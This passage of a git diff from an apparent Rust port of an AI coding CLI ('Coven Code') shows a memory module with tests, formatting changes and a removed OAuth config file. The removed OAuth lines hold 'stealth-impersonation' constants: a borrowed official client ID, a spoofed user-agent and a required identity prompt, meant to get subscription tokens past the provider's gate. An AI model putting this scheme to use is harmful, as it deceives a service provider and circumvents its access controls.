an ISO-8601-like timestamp. + let ts = format_unix_secs_iso(m.modified_secs); + + match &m.description { + Some(desc) => format!("- {}{} ({}): {}", tag, m.filename, ts, desc), + None => format!("- {}{}", tag, m.filename), + } + }) + .collect::>() + .join("\n") +} + +/// Minimal ISO-8601 formatter for a Unix timestamp (no external deps). +fn format_unix_secs_iso(secs: u64) -> String { + // We use a very lightweight implementation to avoid pulling in chrono here + // (chrono is already a workspace dep but we want this module to stay lean). + // Accuracy to the day is sufficient for memory manifests. + let days_since_epoch = secs / 86400; + // Julian Day Number for 1970-01-01 is 2440588. + let jdn = days_since_epoch as u32 + 2440588; + let (y, m, d) = jdn_to_ymd(jdn); + let hh = (secs % 86400) / 3600; + let mm = (secs % 3600) / 60; + let ss = secs % 60; + format!("{:04}-{:02}-{:02}T{:02}:{:02}:{:02}Z", y, m, d, hh, mm, ss) +} + +/// Convert a Julian Day Number to (year, month, day). +fn jdn_to_ymd(jdn: u32) -> (u32, u32, u32) { + let a = jdn + 32044; + let b = (4 * a + 3) / 146097; + let c = a - (146097 * b) / 4; + let d = (4 * c + 3) / 1461; + let e = c - (1461 * d) / 4; + let m = (5 * e + 2) / 153; + let day = e - (153 * m + 2) / 5 + 1; + let month = m + 3 - 12 * (m / 10); + let year = 100 * b + d - 4800 + m / 10; + (year, month, day) +} + +// --------------------------------------------------------------------------- +// Memory age / freshness +// --------------------------------------------------------------------------- + +/// Days elapsed since `modified_secs`. Floor-rounded; clamped to 0 for +/// future mtimes (clock skew). +/// +/// Mirrors `memoryAgeDays` in `memoryAge.ts`. +pub fn memory_age_days(modified_secs: u64) -> u64 { + let now = SystemTime::now() + .duration_since(UNIX_EPOCH) + .unwrap_or_default() + .as_secs(); + (now.saturating_sub(modified_secs)) / 86400 +} + +/// Human-readable age string. Models are poor at date arithmetic — a raw +/// ISO timestamp does not trigger staleness reasoning the way "47 days ago" does. +/// +/// Mirrors `memoryAge` in `memoryAge.ts`. +pub fn memory_age(modified_secs: u64) -> String { + let d = memory_age_days(modified_secs); + match d { + 0 => "today".to_string(), + 1 => "yesterday".to_string(), + n => format!("{} days ago", n), + } +} + +/// Plain-text staleness caveat for memories > 1 day old. +/// Returns an empty string for fresh memories (today / yesterday). +/// +/// Mirrors `memoryFreshnessText` in `memoryAge.ts`. +pub fn memory_freshness_text(modified_secs: u64) -> String { + let d = memory_age_days(modified_secs); + if d <= 1 { + return String::new(); + } + format!( + "This memory is {} days old. \ + Memories are point-in-time observations, not live state — \ + claims about code behavior or file:line citations may be outdated. \ + Verify against current code before asserting as fact.", + d + ) +} + +/// Per-memory staleness note wrapped in `` tags. +/// Returns an empty string for memories ≤ 1 day old. +/// +/// Mirrors `memoryFreshnessNote` in `memoryAge.ts`. +pub fn memory_freshness_note(modified_secs: u64) -> String { + let text = memory_freshness_text(modified_secs); + if text.is_empty() { + return String::new(); + } + format!("{}\n", text) +} + +// --------------------------------------------------------------------------- +// Path resolution +// --------------------------------------------------------------------------- + +/// Entrypoint filename within the memory directory. +pub const MEMORY_ENTRYPOINT: &str = "MEMORY.md"; + +/// Maximum number of lines loaded from `MEMORY.md`. +/// Matches `MAX_ENTRYPOINT_LINES` in `memdir.ts`. +pub const MAX_ENTRYPOINT_LINES: usize = 200; + +/// Maximum bytes loaded from `MEMORY.md`. +/// Matches `MAX_ENTRYPOINT_BYTES` in `memdir.ts`. +pub const MAX_ENTRYPOINT_BYTES: usize = 25_000; + +/// Compute the auto-memory directory path for a project root. +/// +/// Resolution order (mirrors `getAutoMemPath` in `paths.ts`): +/// 1. `CLAUDE_COWORK_MEMORY_PATH_OVERRIDE` env var (full-path override). +/// 2. `/projects//memory/` +/// when `COVEN_CODE_REMOTE_MEMORY_DIR` is set. +/// 3. `~/.coven-code/projects//memory/` (default). +pub fn auto_memory_path(project_root: &Path) -> PathBuf { + // 1. Cowork full-path override. + if let Ok(override_path) = std::env::var("CLAUDE_COWORK_MEMORY_PATH_OVERRIDE") { + if !override_path.is_empty() { + return PathBuf::from(override_path); + } + } + + // 2. Determine the memory base directory. + let memory_base = std::env::var("COVEN_CODE_REMOTE_MEMORY_DIR") + .map(PathBuf::from) + .unwrap_or_else(|_| { + dirs::home_dir() + .unwrap_or_else(|| PathBuf::from(".")) + .join(".coven-code") + }); + + // 3. Sanitize the project root into a safe directory name. + let sanitized = sanitize_path_component(&project_root.to_string_lossy()); + + memory_base.join("projects").join(sanitized).join("memory") +} + +/// Sanitize an arbitrary string into a directory-name-safe component. +/// Matches `sanitizePath` used inside `getAutoMemPath` in `paths.ts`. +pub fn sanitize_path_component(s: &str) -> String { + s.chars() + .map(|c| { + if c.is_alphanumeric() || c == '-' || c == '_' || c == '.' { + c + } else { + '_' + } + }) + .collect() +} + +/// Whether the auto-memory system is enabled for this session. +/// +/// Priority chain (mirrors `isAutoMemoryEnabled` in `paths.ts`): +/// 1. `COVEN_CODE_DISABLE_AUTO_MEMORY` — truthy → OFF, falsy (but defined) → ON. +/// 2. `COVEN_CODE_SIMPLE` (--bare) → OFF. +/// 3. Remote mode without `COVEN_CODE_REMOTE_MEMORY_DIR` → OFF. +/// 4. `settings_enabled` parameter (from settings.json `autoMemoryEnabled` field). +/// 5. Default: enabled. +pub fn is_auto_memory_enabled(settings_enabled: Option) -> bool { + if let Ok(val) = std::env::var("COVEN_CODE_DISABLE_AUTO_MEMORY") { + // Truthy values (non-empty, non-"0", non-"false") disable memory. + match val.to_lowercase().as_str() { + "" | "0" | "false" | "no" | "off" => return true, // defined-falsy → ON + _ => return false, // truthy → OFF + } + } + + if std::env::var("COVEN_CODE_SIMPLE").is_ok() { + return false; + } + + if std::env::var("COVEN_CODE_REMOTE").is_ok() + && std::env::var("COVEN_CODE_REMOTE_MEMORY_DIR").is_err() + { + return false; + } + + settings_enabled.unwrap_or(true) +} + +// --------------------------------------------------------------------------- +// Index loading and truncation +// --------------------------------------------------------------------------- + +/// Result of loading and (optionally) truncating the `MEMORY.md` entrypoint. +#[derive(Debug, Clone)] +pub struct EntrypointTruncation { + pub content: String, + pub line_count: usize, + pub byte_count: usize, + pub was_line_truncated: bool, + pub was_byte_truncated: bool, +} + +/// Truncate `MEMORY.md` content to `MAX_ENTRYPOINT_LINES` lines and +/// `MAX_ENTRYPOINT_BYTES` bytes, appending a warning when either cap fires. +/// +/// Mirrors `truncateEntrypointContent` in `memdir.ts`. +pub fn truncate_entrypoint_content(raw: &str) -> EntrypointTruncation { + let trimmed = raw.trim(); + let content_lines: Vec<&str> = trimmed.lines().collect(); + let line_count = content_lines.len(); + let byte_count = trimmed.len(); + + let was_line_truncated = line_count > MAX_ENTRYPOINT_LINES; + let was_byte_truncated = byte_count > MAX_ENTRYPOINT_BYTES; + + if !was_line_truncated && !was_byte_truncated { + return EntrypointTruncation { + content: trimmed.to_string(), + line_count, + byte_count, + was_line_truncated: false, + was_byte_truncated: false, + }; + } + + let mut truncated = if was_line_truncated { + content_lines[..MAX_ENTRYPOINT_LINES].join("\n") + } else { + trimmed.to_string() + }; + + if truncated.len() > MAX_ENTRYPOINT_BYTES { + let cut_at = truncated[..MAX_ENTRYPOINT_BYTES] + .rfind('\n') + .unwrap_or(MAX_ENTRYPOINT_BYTES); + truncated.truncate(cut_at); + } + + let reason = match (was_line_truncated, was_byte_truncated) { + (true, false) => format!("{} lines (limit: {})", line_count, MAX_ENTRYPOINT_LINES), + (false, true) => format!( + "{} bytes (limit: {}) — index entries are too long", + byte_count, MAX_ENTRYPOINT_BYTES + ), + _ => format!("{} lines and {} bytes", line_count, byte_count), + }; + + truncated.push_str(&format!( + "\n\n> WARNING: {} is {}. Only part of it was loaded. \ + Keep index entries to one line under ~200 chars; move detail into topic files.", + MEMORY_ENTRYPOINT, reason + )); + + EntrypointTruncation { + content: truncated, + line_count, + byte_count, + was_line_truncated, + was_byte_truncated, + } +} + +/// Load and truncate the `MEMORY.md` index from `memory_dir`. +/// Returns `None` when the file does not exist or is empty. +/// +/// Mirrors the entrypoint-reading path in `buildMemoryPrompt` / `loadMemoryPrompt`. +pub fn load_memory_index(memory_dir: &Path) -> Option { + let index_path = memory_dir.join(MEMORY_ENTRYPOINT); + if !index_path.exists() { + return None; + } + let raw = std::fs::read_to_string(&index_path).ok()?; + if raw.trim().is_empty() { + return None; + } + Some(truncate_entrypoint_content(&raw)) +} + +// --------------------------------------------------------------------------- +// System-prompt memory content builder +// --------------------------------------------------------------------------- + +/// Build the memory content string to inject into the system prompt's +/// `` block. +/// +/// Always includes the `MEMORY.md` index when it exists. +/// Called during `build_system_prompt` → `SystemPromptOptions::memory_content`. +pub fn build_memory_prompt_content(memory_dir: &Path) -> String { + let mut parts: Vec = Vec::new(); + + if let Some(index) = load_memory_index(memory_dir) { + parts.push(format!("## Memory Index (MEMORY.md)\n{}", index.content)); + } + + parts.join("\n\n") +} + +/// Ensure the memory directory exists, creating it (and any parents) if needed. +/// Errors are silently swallowed (the Write tool will surface them if needed). +/// +/// Mirrors `ensureMemoryDirExists` in `memdir.ts`. +pub fn ensure_memory_dir_exists(memory_dir: &Path) { + if let Err(e) = std::fs::create_dir_all(memory_dir) { + // Log at debug level so --debug shows why, but don't abort. + tracing::debug!( + dir = %memory_dir.display(), + error = %e, + "ensureMemoryDirExists failed" + ); + } +} + +// --------------------------------------------------------------------------- +// Simple relevance search (no LLM side-query) +// --------------------------------------------------------------------------- + +/// Find and load the most relevant memory files for a query using a +/// lightweight TF-IDF-style keyword score. +/// +/// The full Sonnet side-query (`findRelevantMemories` in TypeScript) lives +/// in `cc-query`; this function provides a cheaper fallback for contexts +/// where an API call is not available. +pub fn find_relevant_memories_simple( + memory_dir: &Path, + query: &str, + max_files: usize, +) -> Vec { + let metas = scan_memory_dir(memory_dir); + let query_lower = query.to_lowercase(); + let query_words: Vec<&str> = query_lower.split_whitespace().collect(); + + if query_words.is_empty() { + return Vec::new(); + } + + let mut scored: Vec<(f32, MemoryFileMeta)> = metas + .into_iter() + .filter_map(|meta| { + let desc = meta.description.as_deref().unwrap_or("").to_lowercase(); + let name = meta.name.as_deref().unwrap_or("").to_lowercase(); + let filename = meta.filename.to_lowercase(); + + let score: f32 = query_words + .iter() + .map(|w| { + let in_name = if name.contains(*w) { 2.0_f32 } else { 0.0 }; + let in_desc = if desc.contains(*w) { 1.0_f32 } else { 0.0 }; + let in_file = if filename.contains(*w) { 0.5_f32 } else { 0.0 }; + in_name + in_desc + in_file + }) + .sum(); + + if score > 0.0 { + Some((score, meta)) + } else { + None + } + }) + .collect(); + + // Sort highest score first. + scored.sort_by(|a, b| b.0.partial_cmp(&a.0).unwrap_or(std::cmp::Ordering::Equal)); + + scored + .into_iter() + .take(max_files) + .filter_map(|(_, meta)| { + let content = std::fs::read_to_string(&meta.path).ok()?; + Some(MemoryFile { meta, content }) + }) + .collect() +} + +// --------------------------------------------------------------------------- +// Team memory helpers +// --------------------------------------------------------------------------- + +/// Return the team-memory sub-directory path. +/// Mirrors `getTeamMemPath` in `teamMemPaths.ts`. +pub fn team_memory_path(auto_memory_dir: &Path) -> PathBuf { + auto_memory_dir.join("team") +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use super::*; + use std::io::Write as IoWrite; + + // Helpers ---------------------------------------------------------------- + + fn make_temp_dir() -> tempfile::TempDir { + tempfile::tempdir().expect("tempdir") + } + + fn write_file(dir: &Path, name: &str, content: &str) { + let path = dir.join(name); + if let Some(parent) = path.parent() { + std::fs::create_dir_all(parent).unwrap(); + } + let mut f = std::fs::File::create(&path).unwrap(); + f.write_all(content.as_bytes()).unwrap(); + } + + // ---- parse_frontmatter_quick ------------------------------------------- + + #[test] + fn test_parse_frontmatter_full() { + let content = "---\nname: My Memory\ndescription: A test description\ntype: feedback\n---\n\nBody text."; + let (name, desc, mt) = parse_frontmatter_quick(content); + assert_eq!(name.as_deref(), Some("My Memory")); + assert_eq!(desc.as_deref(), Some("A test description")); + assert_eq!(mt, Some(MemoryType::Feedback)); + } + + #[test] + fn test_parse_frontmatter_no_frontmatter() { + let content = "Just plain text."; + let (name, desc, mt) = parse_frontmatter_quick(content); + assert!(name.is_none()); + assert!(desc.is_none()); + assert!(mt.is_none()); + } + + #[test] + fn test_parse_frontmatter_quoted_values() { + let content = "---\nname: \"Quoted Name\"\ndescription: 'Single quoted'\ntype: user\n---"; + let (name, desc, mt) = parse_frontmatter_quick(content); + assert_eq!(name.as_deref(), Some("Quoted Name")); + assert_eq!(desc.as_deref(), Some("Single quoted")); + assert_eq!(mt, Some(MemoryType::User)); + } + + #[test] + fn test_parse_frontmatter_unknown_type() { + let content = "---\ntype: unknown_type\n---"; + let (_, _, mt) = parse_frontmatter_quick(content); + assert!(mt.is_none()); + } + + // ---- memory_age_days --------------------------------------------------- + + #[test] + fn test_memory_age_today() { + let now_secs = SystemTime::now() + .duration_since(UNIX_EPOCH) + .unwrap() + .as_secs(); + assert_eq!(memory_age_days(now_secs), 0); + } + + #[test] + fn test_memory_age_one_day_ago() { + let yesterday = SystemTime::now() + .duration_since(UNIX_EPOCH) + .unwrap() + .as_secs() + .saturating_sub(86_400); + assert_eq!(memory_age_days(yesterday), 1); + } + + #[test] + fn test_memory_age_future_clamps_to_zero() { + let far_future = u64::MAX; + assert_eq!(memory_age_days(far_future), 0); + } + + // ---- memory_freshness_text --------------------------------------------- + + #[test] + fn test_freshness_text_fresh() { + let now = SystemTime::now() + .duration_since(UNIX_EPOCH) + .unwrap() + .as_secs(); + assert!(memory_freshness_text(now).is_empty()); + } + + #[test] + fn test_freshness_text_stale() { + let old = SystemTime::now() + .duration_since(UNIX_EPOCH) + .unwrap() + .as_secs() + .saturating_sub(10 * 86_400); // 10 days ago + let text = memory_freshness_text(old); + assert!(text.contains("10 days old")); + assert!(text.contains("point-in-time")); + } + + // ---- memory_freshness_note --------------------------------------------- + + #[test] + fn test_freshness_note_fresh_is_empty() { + let now = SystemTime::now() + .duration_since(UNIX_EPOCH) + .unwrap() + .as_secs(); + assert!(memory_freshness_note(now).is_empty()); + } + + #[test] + fn test_freshness_note_stale_has_tags() { + let old = SystemTime::now() + .duration_since(UNIX_EPOCH) + .unwrap() + .as_secs() + .saturating_sub(5 * 86_400); + let note = memory_freshness_note(old); + assert!(note.contains("")); + assert!(note.contains("")); + } + + // ---- truncate_entrypoint_content --------------------------------------- + + #[test] + fn test_truncate_no_truncation_needed() { + let content = "line1\nline2\nline3"; + let result = truncate_entrypoint_content(content); + assert!(!result.was_line_truncated); + assert!(!result.was_byte_truncated); + assert_eq!(result.content, content); + } + + #[test] + fn test_truncate_line_limit() { + let content = (0..=MAX_ENTRYPOINT_LINES) + .map(|i| format!("line {}", i)) + .collect::>() + .join("\n"); + let result = truncate_entrypoint_content(&content); + assert!(result.was_line_truncated); + assert!(result.content.contains("WARNING")); + } + + // ---- sanitize_path_component ------------------------------------------- + + #[test] + fn test_sanitize_path_component() { + assert_eq!( + sanitize_path_component("/home/user/project"), + "_home_user_project" + ); + assert_eq!( + sanitize_path_component("normal-name_123"), + "normal-name_123" + ); + assert_eq!(sanitize_path_component("C:\\Users\\foo"), "C__Users_foo"); + } + + // ---- load_memory_index ------------------------------------------------- + + #[test] + fn test_load_memory_index_nonexistent() { + let dir = make_temp_dir(); + assert!(load_memory_index(dir.path()).is_none()); + } + + #[test] + fn test_load_memory_index_empty() { + let dir = make_temp_dir(); + write_file(dir.path(), "MEMORY.md", " "); + assert!(load_memory_index(dir.path()).is_none()); + } + + #[test] + fn test_load_memory_index_with_content() { + let dir = make_temp_dir(); + write_file(dir.path(), "MEMORY.md", "- [test.md](test.md) — something"); + let result = load_memory_index(dir.path()).unwrap(); + assert!(result.content.contains("test.md")); + } + + // ---- scan_memory_dir --------------------------------------------------- + + #[test] + fn test_scan_excludes_memory_md() { + let dir = make_temp_dir(); + write_file(dir.path(), "MEMORY.md", "# index"); + write_file(dir.path(), "user_role.md", "---\nname: Role\n---"); + let metas = scan_memory_dir(dir.path()); + assert_eq!(metas.len(), 1); + assert_eq!(metas[0].filename, "user_role.md"); + } + + #[test] + fn test_scan_empty_dir() { + let dir = make_temp_dir(); + assert!(scan_memory_dir(dir.path()).is_empty()); + } + + #[test] + fn test_scan_nonexistent_dir() { + let path = PathBuf::from("/tmp/nonexistent_memory_dir_cc_rust_test_xyz"); + assert!(scan_memory_dir(&path).is_empty()); + } + + // ---- format_memory_manifest -------------------------------------------- + + #[test] + fn test_format_memory_manifest_with_description() { + let meta = MemoryFileMeta { + filename: "user_role.md".to_string(), + path: PathBuf::from("user_role.md"), + name: Some("User Role".to_string()), + description: Some("The user is a data scientist".to_string()), + memory_type: Some(MemoryType::User), + modified_secs: 0, + }; + let manifest = format_memory_manifest(&[meta]); + assert!(manifest.contains("[user]")); + assert!(manifest.contains("user_role.md")); + assert!(manifest.contains("data scientist")); + } + + #[test] + fn test_format_memory_manifest_no_description() { + let meta = MemoryFileMeta { + filename: "ref.md".to_string(), + path: PathBuf::from("ref.md"), + name: None, + description: None, + memory_type: None, + modified_secs: 0, + }; + let manifest = format_memory_manifest(&[meta]); + assert!(manifest.contains("ref.md")); + // No description separator colon + assert!(!manifest.contains("ref.md (")); + } + + // ---- MemoryType -------------------------------------------------------- + + #[test] + fn test_memory_type_roundtrip() { + for (s, expected) in [ + ("user", MemoryType::User), + ("feedback", MemoryType::Feedback), + ("project", MemoryType::Project), + ("reference", MemoryType::Reference), + ] { + let parsed = MemoryType::parse(s).unwrap(); + assert_eq!(parsed, expected); + assert_eq!(parsed.as_str(), s); + } + } + + #[test] + fn test_memory_type_unknown_returns_none() { + assert!(MemoryType::parse("bogus").is_none()); + } + + // ---- is_auto_memory_enabled ------------------------------------------- + + #[test] + fn test_auto_memory_enabled_default() { + // No env vars set for this test, settings None → should be enabled. + // We can't guarantee the test environment is clean, so just check it + // returns a bool without panicking. + let _ = is_auto_memory_enabled(None); + } + + #[test] + fn test_auto_memory_disabled_by_setting() { + // If settings explicitly disable it and no env override, returns false. + // We only test the settings-path without touching process env. + // Simulate: env vars not set, settings says false. + // We can't unset env vars reliably in tests, so just ensure the + // function handles Some(false) without panicking. + // (The full env-var paths are integration-tested separately.) + let _ = is_auto_memory_enabled(Some(false)); + } +} diff --git a/src-rust/crates/core/src/message_utils.rs b/src-rust/crates/core/src/message_utils.rs index faff573..4224223 100644 --- a/src-rust/crates/core/src/message_utils.rs +++ b/src-rust/crates/core/src/message_utils.rs @@ -16,7 +16,10 @@ pub fn estimate_tokens(text: &str) -> u64 { /// Estimate total tokens for a slice of messages. pub fn estimate_messages_tokens(messages: &[Message]) -> u64 { - messages.iter().map(|m| estimate_tokens(&get_message_text(m)) + 4).sum() + messages + .iter() + .map(|m| estimate_tokens(&get_message_text(m)) + 4) + .sum() } /// Context-window info for a model / token count pair. @@ -30,19 +33,37 @@ pub struct ContextUsage { pub fn calculate_context_window_usage(messages: &[Message], model: &str) -> ContextUsage { let used = estimate_messages_tokens(messages); let total = context_window_for_model(model); - let pct = if total > 0 { (used as f64 / total as f64) * 100.0 } else { 0.0 }; + let pct = if total > 0 { + (used as f64 / total as f64) * 100.0 + } else { + 0.0 + }; ContextUsage { used, total, pct } } /// Return the context window token limit for a known model. pub fn context_window_for_model(model: &str) -> u64 { - if model.contains("claude-3-5-haiku") { return 200_000; } - if model.contains("claude-3-5-sonnet") { return 200_000; } - if model.contains("claude-3-7-sonnet") { return 200_000; } - if model.contains("claude-sonnet-4") { return 200_000; } - if model.contains("claude-opus-4") { return 200_000; } - if model.contains("opus") { return 200_000; } - if model.contains("haiku") { return 200_000; } + if model.contains("claude-3-5-haiku") { + return 200_000; + } + if model.contains("claude-3-5-sonnet") { + return 200_000; + } + if model.contains("claude-3-7-sonnet") { + return 200_000; + } + if model.contains("claude-sonnet-4") { + return 200_000; + } + if model.contains("claude-opus-4") { + return 200_000; + } + if model.contains("opus") { + return 200_000; + } + if model.contains("haiku") { + return 200_000; + } 200_000 // safe default } @@ -70,9 +91,9 @@ pub fn get_message_text(msg: &Message) -> String { pub fn is_tool_use_message(msg: &Message) -> bool { msg.role == Role::Assistant && match &msg.content { - MessageContent::Blocks(blocks) => { - blocks.iter().any(|b| matches!(b, ContentBlock::ToolUse { .. })) - } + MessageContent::Blocks(blocks) => blocks + .iter() + .any(|b| matches!(b, ContentBlock::ToolUse { .. })), _ => false, } } @@ -81,9 +102,9 @@ pub fn is_tool_use_message(msg: &Message) -> bool { pub fn is_tool_result_message(msg: &Message) -> bool { msg.role == Role::User && match &msg.content { - MessageContent::Blocks(blocks) => { - blocks.iter().any(|b| matches!(b, ContentBlock::ToolResult { .. })) - } + MessageContent::Blocks(blocks) => blocks + .iter() + .any(|b| matches!(b, ContentBlock::ToolResult { .. })), _ => false, } } @@ -130,12 +151,15 @@ pub fn truncate_message_content(msg: &mut Message, max_chars: usize) { pub fn format_tool_result(result: &Value) -> String { match result { Value::String(s) => s.clone(), - Value::Array(arr) => { - arr.iter() - .filter_map(|v| v.get("text").and_then(|t| t.as_str()).map(|s| s.to_string())) - .collect::>() - .join("\n") - } + Value::Array(arr) => arr + .iter() + .filter_map(|v| { + v.get("text") + .and_then(|t| t.as_str()) + .map(|s| s.to_string()) + }) + .collect::>() + .join("\n"), other => other.to_string(), } } @@ -146,7 +170,13 @@ mod tests { use crate::types::{ContentBlock, Message, MessageContent, Role}; fn user_msg(text: &str) -> Message { - Message { role: Role::User, content: MessageContent::Text(text.to_string()), uuid: None, cost: None, snapshot_patch: None } + Message { + role: Role::User, + content: MessageContent::Text(text.to_string()), + uuid: None, + cost: None, + snapshot_patch: None, + } } #[test] @@ -164,8 +194,12 @@ mod tests { #[test] fn merge_text_blocks() { let blocks = vec![ - ContentBlock::Text { text: "a".to_string() }, - ContentBlock::Text { text: "b".to_string() }, + ContentBlock::Text { + text: "a".to_string(), + }, + ContentBlock::Text { + text: "b".to_string(), + }, ]; let merged = merge_consecutive_text_blocks(blocks); assert_eq!(merged.len(), 1); diff --git a/src-rust/crates/core/src/migrations.rs b/src-rust/crates/core/src/migrations.rs index 6d1a03f..b870793 100644 --- a/src-rust/crates/core/src/migrations.rs +++ b/src-rust/crates/core/src/migrations.rs @@ -20,10 +20,19 @@ pub type MigrationFn = fn(&mut Value) -> bool; /// All migrations in the order they must be applied. pub const MIGRATIONS: &[(&str, MigrationFn)] = &[ ("migrate_fennec_to_opus", migrate_fennec_to_opus), - ("migrate_legacy_opus_to_current", migrate_legacy_opus_to_current), + ( + "migrate_legacy_opus_to_current", + migrate_legacy_opus_to_current, + ), ("migrate_opus_to_opus_1m", migrate_opus_to_opus_1m), - ("migrate_sonnet_1m_to_sonnet_45", migrate_sonnet_1m_to_sonnet_45), - ("migrate_sonnet_45_to_sonnet_46", migrate_sonnet_45_to_sonnet_46), + ( + "migrate_sonnet_1m_to_sonnet_45", + migrate_sonnet_1m_to_sonnet_45, + ), + ( + "migrate_sonnet_45_to_sonnet_46", + migrate_sonnet_45_to_sonnet_46, + ), ( "migrate_bypass_permissions_to_settings", migrate_bypass_permissions_to_settings, @@ -32,7 +41,10 @@ pub const MIGRATIONS: &[(&str, MigrationFn)] = &[ "migrate_repl_bridge_to_remote_control", migrate_repl_bridge_to_remote_control, ), - ("migrate_enable_all_mcp_servers", migrate_enable_all_mcp_servers), + ( + "migrate_enable_all_mcp_servers", + migrate_enable_all_mcp_servers, + ), ("migrate_auto_updates", migrate_auto_updates), ("reset_auto_mode_opt_in", reset_auto_mode_opt_in), ("reset_pro_to_opus_default", reset_pro_to_opus_default), diff --git a/src-rust/crates/core/src/oauth_config.rs b/src-rust/crates/core/src/oauth_config.rs index f0f6b2a..24380e9 100644 --- a/src-rust/crates/core/src/oauth_config.rs +++ b/src-rust/crates/core/src/oauth_config.rs @@ -1,548 +1,545 @@ -//! OAuth configuration for multiple environments. -//! -//! This module mirrors the TypeScript `src/constants/oauth.ts` and -//! `src/services/oauth/crypto.ts` constants. It is intentionally -//! *configuration-only* — no live network I/O except for the optional -//! `fetch_oauth_profile` helper at the bottom. - -use serde::{Deserialize, Serialize}; - -// --------------------------------------------------------------------------- -// Scope constants (mirrors constants/oauth.ts) -// --------------------------------------------------------------------------- - -/// The Claude.ai inference scope — required for Bearer-auth API calls. -pub const CLAUDE_AI_INFERENCE_SCOPE: &str = "user:inference"; - -/// The profile scope — required to read account / subscription data. -pub const CLAUDE_AI_PROFILE_SCOPE: &str = "user:profile"; - -/// Console scope — used when creating an API key via the Console flow. -pub const CONSOLE_SCOPE: &str = "org:create_api_key"; - -/// All Claude.ai OAuth scopes (mirrors `CLAUDE_AI_OAUTH_SCOPES`). -pub const CLAUDE_AI_OAUTH_SCOPES: &[&str] = &[ - CLAUDE_AI_PROFILE_SCOPE, - CLAUDE_AI_INFERENCE_SCOPE, - "user:sessions:claude_code", - "user:mcp_servers", - "user:file_upload", -]; - -/// Console OAuth scopes (mirrors `CONSOLE_OAUTH_SCOPES`). -pub const CONSOLE_OAUTH_SCOPES: &[&str] = &[CONSOLE_SCOPE, CLAUDE_AI_PROFILE_SCOPE]; - -/// Union of all scopes used during login (mirrors `ALL_OAUTH_SCOPES`). -/// Requesting all at once lets a single login satisfy both Console and -/// claude.ai auth paths. -pub const ALL_OAUTH_SCOPES: &[&str] = &[ - CONSOLE_SCOPE, - CLAUDE_AI_PROFILE_SCOPE, - CLAUDE_AI_INFERENCE_SCOPE, - "user:sessions:claude_code", - "user:mcp_servers", - "user:file_upload", -]; - -/// Minimum scopes required for basic operation. -pub const MINIMUM_SCOPES: &[&str] = &[CLAUDE_AI_INFERENCE_SCOPE, CLAUDE_AI_PROFILE_SCOPE]; - -// --------------------------------------------------------------------------- -// Claude Code stealth-impersonation constants -// --------------------------------------------------------------------------- - -/// User-Agent advertised to Anthropic's API on OAuth-authenticated requests. -/// Must match a Claude Code version the server still accepts; bump when -/// Anthropic invalidates the current value. -pub const CLAUDE_CODE_VERSION_FOR_OAUTH: &str = "2.1.75"; - -/// `anthropic-beta` flags that must be present on every OAuth-authenticated -/// request. Without these the API server rejects subscription tokens. -pub const OAUTH_BETA_FLAGS: &[&str] = &["claude-code-20250219", "oauth-2025-04-20"]; - -/// System-prompt prefix that must appear as the first system block on every -/// OAuth-authenticated request. Anthropic's gate refuses requests whose system -/// prompt does not start with this identity string. -pub const CLAUDE_CODE_SYSTEM_PROMPT_PREFIX: &str = - "You are Claude Code, Anthropic's official CLI for Claude."; - -// --------------------------------------------------------------------------- -// OAuthConfig struct -// --------------------------------------------------------------------------- - -/// Full OAuth configuration for a deployment environment. -#[derive(Debug, Clone)] -pub struct OAuthConfig { - pub base_api_url: &'static str, - pub console_authorize_url: &'static str, - pub claude_ai_authorize_url: &'static str, - /// The raw claude.ai web origin (separate from the authorize URL which - /// may bounce through claude.com for attribution). - pub claude_ai_origin: &'static str, - pub token_url: &'static str, - pub api_key_url: &'static str, - pub roles_url: &'static str, - pub console_success_url: &'static str, - pub claudeai_success_url: &'static str, - pub manual_redirect_url: &'static str, - pub client_id: &'static str, - pub oauth_file_suffix: &'static str, - pub mcp_proxy_url: &'static str, - pub mcp_proxy_path: &'static str, -} - -// --------------------------------------------------------------------------- -// Production config (mirrors PROD_OAUTH_CONFIG in oauth.ts) -// --------------------------------------------------------------------------- - -// Claude Code OAuth client ID, used in stealth-impersonation mode so that -// Anthropic's auth server accepts Claude Pro/Max tokens through Coven Code. -// The matching request-time impersonation (user-agent, x-app, anthropic-beta, -// and the Claude Code system-prompt prefix) is wired up in -// `claurst_api::client::AnthropicClient` and is required for these tokens to -// be honoured by the API. -// -// Billing note: tokens minted by a Pro/Max subscription draw from the -// account's "extra usage" pool when used by a third-party client — they do -// not consume subscription quota. Users should be aware of this before -// switching from API-key auth. -pub const PROD_OAUTH: OAuthConfig = OAuthConfig { - base_api_url: "https://api.anthropic.com", - // Routes through claude.com/cai/* for attribution, 307s to claude.ai in - // two hops — same behaviour as the TypeScript client. - console_authorize_url: "https://platform.claude.com/oauth/authorize", - claude_ai_authorize_url: "https://claude.com/cai/oauth/authorize", - claude_ai_origin: "https://claude.ai", - token_url: "https://platform.claude.com/v1/oauth/token", - api_key_url: "https://api.anthropic.com/api/oauth/claude_cli/create_api_key", - roles_url: "https://api.anthropic.com/api/oauth/claude_cli/roles", - console_success_url: "https://platform.claude.com/buy_credits?returnUrl=/oauth/code/success%3Fapp%3Dclaude-code", - claudeai_success_url: "https://platform.claude.com/oauth/code/success?app=claude-code", - manual_redirect_url: "https://platform.claude.com/oauth/code/callback", - client_id: "9d1c250a-e61b-44d9-88ed-5944d1962f5e", // Claude Code client ID (stealth) - oauth_file_suffix: "", - mcp_proxy_url: "https://mcp-proxy.anthropic.com", - mcp_proxy_path: "/v1/mcp/{server_id}", -}; - -// --------------------------------------------------------------------------- -// Staging config (mirrors STAGING_OAUTH_CONFIG — ant builds only) -// --------------------------------------------------------------------------- - -pub const STAGING_OAUTH: OAuthConfig = OAuthConfig { - base_api_url: "https://api-staging.anthropic.com", - console_authorize_url: "https://platform.staging.ant.dev/oauth/authorize", - claude_ai_authorize_url: "https://claude-ai.staging.ant.dev/oauth/authorize", - claude_ai_origin: "https://claude-ai.staging.ant.dev", - token_url: "https://platform.staging.ant.dev/v1/oauth/token", - api_key_url: "https://api-staging.anthropic.com/api/oauth/claude_cli/create_api_key", - roles_url: "https://api-staging.anthropic.com/api/oauth/claude_cli/roles", - console_success_url: "https://platform.staging.ant.dev/buy_credits?returnUrl=/oauth/code/success%3Fapp%3Dclaude-code", - claudeai_success_url: "https://platform.staging.ant.dev/oauth/code/success?app=claude-code", - manual_redirect_url: "https://platform.staging.ant.dev/oauth/code/callback", - client_id: "22422756-60c9-4084-8eb7-27705fd5cf9a", // Claude Code staging 